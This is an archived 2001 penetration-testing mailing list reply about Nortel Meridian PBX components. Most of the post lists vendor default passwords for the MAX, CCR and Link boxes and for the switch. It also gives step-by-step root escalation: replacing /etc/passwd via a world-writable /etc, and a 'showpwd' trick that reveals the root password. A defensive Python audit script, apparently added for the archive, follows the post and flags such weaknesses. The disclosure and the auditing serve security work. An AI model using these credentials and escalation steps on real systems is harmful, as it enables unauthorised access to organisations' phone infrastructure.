Penetration Testing mailing list archives

Re: Nortel Security


From: Mark Rowe <mark () whatnot demon co uk>
Date: Tue, 10 Jul 2001 12:17:08 +0100

In article <01063012540504.01490@sliver>, H D Moore
<hdm () secureaustin com> writes

> I came across this while doing a security review 3 years ago. I tried to
> contact Nortel several times but never received a response. I guess they
> don't think it is important :-o
>
> If the PBX is hooked into the actual network, there are quite a few ways to
> get access to the system.  The easiest method is to tftp the /etc/passwd file
> off the system and crack the hashes.  If you go this route, you will get a
> user account called "service" with a password of "smile" ;)  If you log into
> the system with this account, you will notice that /etc is mode 0777, so
> getting root access is trivial:
>
> $ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
> $ mv /etc/passwd /etc/passwd.bak
> $ mv /etc/mah_passwd /etc/passwd
> $ su root
> # mv /etc/passwd.bak /etc/passwd
>
> I don't remember which version of this system it was, but the client software
> that came with it was called "Meridian Terminal Emulator".  You could manage
> the PBX with this by first logging in with 0000/0000 then giving it the
> manager password of "9999".  I really wish I had more time to write up the
> stuff I find out there...
>
> -HD


Anyway, I think the service account exists on the MAX, CCR and Link
Meridian components.

Here is some other stuff I came across:

Accounts that give UNIX level access
====================================

Box             Account         Password        Use
MAX,CCR,Link    service         smile           General engineer account
CCR,Link        disttech        4tas            Engineer account
MAX             root            3ep5w2u         Root

Accounts that give application level access 
===========================================

Box             Account         Password        Use
MAX             maint           ntacdmax        Maintenance account
CCR, Link       maint           maint           Maintenance account
CCR             ccrusr          ccrusr          User account
Link            mlusr           mlusr           User account


To gain root access on Link or CCR -

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow
(e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen.  You can
now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access
depending on how the switch is set up.  Try password only first as most
will probably be set up like this -

Password only
enter
logi 0000               (customer level)
logi 1111               (a bit higher)
logi 8429               (maintenance)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.

-- 
Mark Rowe
IT Security Consultant
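The thread above describes three host-level weaknesses on the Unix side of these boxes: vendor default accounts left in place, password hashes readable straight out of /etc/passwd (so that fetching the file via tftp exposes them), and a world-writable /etc that lets any user swap in a passwd file with an extra uid-0 entry. The following audit script is an added example written for this archive page; it is not code from the post or from Nortel. It parses a passwd(5)-format file and flags those conditions, and checks a directory's mode bits for world-write. The sample passwd content embedded in it is constructed for the demo and the hash strings in it are placeholders, not real hashes from any system.

```python
import os
import stat

# Constructed sample /etc/passwd content for the demo (not captured from any real system).
# It deliberately contains the conditions the thread describes: vendor default accounts,
# a hash stored directly in passwd (no shadow file), and an extra uid-0 entry with no password.
SAMPLE_PASSWD = """\
root:$1$abcdefgh$0123456789abcdefghijkl:0:0:root:/root:/bin/sh
service:$1$ijklmnop$0123456789abcdefghijkl:101:100:Engineer:/home/service:/bin/sh
disttech:x:102:100:Engineer:/home/disttech:/bin/sh
maint:x:103:100:Maintenance:/home/maint:/bin/sh
toor::0:0:extra root:/root:/bin/sh
nobody:x:65534:65534:nobody:/:/sbin/nologin
"""

# Vendor/default account names reported in the thread for the MAX, CCR and Link boxes.
KNOWN_DEFAULT_ACCOUNTS = {"service", "disttech", "maint", "ccrusr", "mlusr"}

# Password-field values that mean "look in /etc/shadow" or "locked", i.e. no hash is exposed here.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!", "*LK*", "NP"}


def parse_passwd(text):
    """Parse passwd(5)-format text into a list of dicts; a malformed line raises ValueError."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(entries):
    """Return (account, finding) tuples for the weaknesses the thread describes."""
    findings = []
    for e in entries:
        if e["name"] in KNOWN_DEFAULT_ACCOUNTS:
            findings.append((e["name"], "known vendor default account present"))
        if e["pw"] == "":
            findings.append((e["name"], "empty password field (no password required)"))
        elif e["pw"] not in SHADOWED_OR_LOCKED:
            # A hash in the world-readable passwd file is exactly what copying it off exposes.
            findings.append((e["name"], "password hash stored in passwd (no shadow)"))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "additional uid-0 account"))
    return findings


def is_world_writable(mode):
    """True if the st_mode bits include write-for-others (the 0777 /etc in the thread)."""
    return bool(mode & stat.S_IWOTH)


def audit_directory(path):
    """Return a finding string if `path` is world-writable, else None."""
    mode = os.stat(path).st_mode
    if is_world_writable(mode):
        return f"{path} is world-writable (mode {stat.S_IMODE(mode):04o})"
    return None


if __name__ == "__main__":
    for account, finding in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(f"{account:10s} {finding}")
    # On a real host, point parse_passwd at the contents of /etc/passwd and audit /etc itself.
    if os.path.isdir("/etc"):
        print(audit_directory("/etc") or "/etc: not world-writable")
```

Run against the constructed sample it reports seven findings: the root hash exposed in passwd, the service/disttech/maint default accounts (service also with an exposed hash), and the passwordless uid-0 "toor" entry. The directory check is split into a pure `is_world_writable(mode)` so it can be tested without touching the filesystem.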

--------------------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:

https://alerts.securityfocus.com/